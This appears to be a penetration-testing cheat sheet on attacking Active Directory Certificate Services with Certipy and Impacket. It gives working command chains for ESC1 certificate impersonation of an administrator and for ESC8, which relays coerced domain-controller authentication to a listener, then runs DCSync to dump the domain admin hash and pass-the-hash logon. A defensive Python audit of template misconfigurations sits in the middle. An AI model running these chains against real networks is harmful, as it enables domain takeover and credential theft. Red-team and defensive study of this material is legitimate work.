ADCS Exploitation

For ADCS (Active Directory Certificate Services) attacks, use Certipy to check certificate templates and the CA server configuration for known misconfigurations (ESC1 through ESC8 and later).

Install

pipx install git+https://github.com/ly4k/Certipy

Locate Vulnerable Templates

certipy find -u $ADUSER@$ADDOMAIN -dc-ip $ADCONTROLLER -stdout -vulnerable

Privilege Escalation Vulnerabilities

ESC1

NTLM

# Request a certificate, supplying the target account's UPN in the SAN
certipy req -u $ADUSER@$ADDOMAIN -ca <CA> -template <TEMPLATE NAME> -upn <administrator@$ADDOMAIN>

# Authenticate with the certificate as the UPN from the SAN (returns a TGT and the NT hash), then DCSync
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLER

Kerberos

# Get a Kerberos TGT for the enrolling user
impacket-getTGT $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER
export KRB5CCNAME=$ADUSER.ccache

# Request a certificate using the TGT, supplying the target account's UPN in the SAN
certipy req -k -no-pass -target ADCS-01.EXAMPLE.COM -ca ADCS-01 -template 'Temp-User' -upn <administrator@$ADDOMAIN>

# Authenticate with the certificate as the UPN from the SAN (returns a TGT and the NT hash), then DCSync
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLER
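The conditions behind an ESC1 finding are the ones certipy find -vulnerable checks: the template is published on a CA, the enrollee may supply the subject (msPKI-Certificate-Name-Flag bit ENROLLEE_SUPPLIES_SUBJECT), no manager approval or authorized signatures are required, the EKUs permit client authentication, and a low-privileged principal has Enroll rights. The audit routine below is an added example, not Certipy's own code, and runs over template records constructed inline (in a real audit they would be read from the Certificate Templates container under CN=Public Key Services in the Configuration partition; the record field names and the LOW_PRIV_PRINCIPALS set are assumptions of this example). It also lists which single change would break the chain for each flagged template, which is the useful output for the team that owns the CA.

```python
# Added example: audit certificate template records for the ESC1 condition set.
# Not Certipy's code; template records below are constructed for the example.

# msPKI-Certificate-Name-Flag bit: the requester may supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: requests are held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# Extended key usages that allow a certificate to be used for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Assumed set of "low-privileged" enrollers; a real audit resolves SIDs and group membership.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def allows_authentication(ekus):
    # An empty EKU list imposes no restriction, so it also permits client authentication.
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_conditions(template):
    """Evaluate each ESC1 condition separately so a report can say which one to fix."""
    return {
        "published on a CA": template["published"],
        "enrollee supplies subject": bool(template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures required": template["ra_signature"] == 0,
        "authentication EKU": allows_authentication(template["ekus"]),
        "low-privileged enrollment rights": bool(LOW_PRIV_PRINCIPALS & set(template["enroll"])),
    }


def is_esc1(template):
    # ESC1 needs every condition at once; any single one being false breaks the chain.
    return all(esc1_conditions(template).values())


def remediation(template):
    """Changes that each break the ESC1 chain on their own; any one is sufficient."""
    conds = esc1_conditions(template)
    steps = []
    if conds["enrollee supplies subject"]:
        steps.append("clear ENROLLEE_SUPPLIES_SUBJECT so the subject and UPN are built from AD")
    if conds["no manager approval"]:
        steps.append("set PEND_ALL_REQUESTS to require CA certificate manager approval")
    if conds["low-privileged enrollment rights"]:
        offenders = sorted(LOW_PRIV_PRINCIPALS & set(template["enroll"]))
        steps.append("remove Enroll rights from " + ", ".join(offenders))
    return steps


def audit(templates):
    """Names of templates that satisfy the full ESC1 condition set."""
    return [t["name"] for t in templates if is_esc1(t)]


# Constructed sample records (the 'Temp-User' name mirrors the template used on this page).
SAMPLE_TEMPLATES = [
    {"name": "Temp-User", "published": True, "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signature": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    # Built-in style User template: subject is built from AD, so not ESC1.
    {"name": "User", "published": True, "name_flag": 0x0, "enrollment_flag": 0x0,
     "ra_signature": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    # Enrollee supplies subject, but Server Authentication only: not usable for logon.
    {"name": "WebServer", "published": True, "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signature": 0, "ekus": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Users"]},
    # Same as Temp-User but requests are held for manager approval.
    {"name": "Temp-Approved", "published": True, "name_flag": 0x1, "enrollment_flag": 0x2,
     "ra_signature": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
]

if __name__ == "__main__":
    for name in audit(SAMPLE_TEMPLATES):
        template = next(t for t in SAMPLE_TEMPLATES if t["name"] == name)
        print(f"[ESC1] {name}")
        for step in remediation(template):
            print(f"    fix: {step}")
```

The per-condition breakdown matters more than the yes/no result: "WebServer" is not ESC1 only because of its EKU, and "Temp-Approved" only because of manager approval, so a change to either attribute re-opens the issue; the audit should run after every template edit, not once.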

ESC8

# Start the relay: listens for inbound SMB authentication and relays it to the CA web enrollment endpoint over HTTP
sudo certipy relay -ca <CA IP> -template DomainController -target <CA HOSTNAME>

# Coerce DC (PrinterBug)
git clone https://github.com/dirkjanm/krbrelayx
cd krbrelayx
./printerbug.py <DOMAIN>/$ADUSER@$ADCONTROLLER <LISTENER_IP>

# Use the captured DC certificate to get a TGT for the DC machine account
certipy auth -pfx <CERTIFICATE FILE> -dc-ip $ADCONTROLLER -no-hash
export KRB5CCNAME=$(realpath <DC01.ccache>)

# Dump Domain Admin Hash with DCSync
impacket-secretsdump -k -no-pass $ADDOMAIN/<TGT USERNAME>@$ADCONTROLLER -just-dc-user <administrator>

# PTH to login to DC
impacket-wmiexec $ADDOMAIN/<administrator>@$ADCONTROLLER -hashes '<NTLM HASH>'

If impacket-secretsdump fails with the Kerberos ticket, fall back to pass-the-hash instead: remove -no-hash from the certipy auth command so it also returns the NT hash, then pass that hash with -hashes.
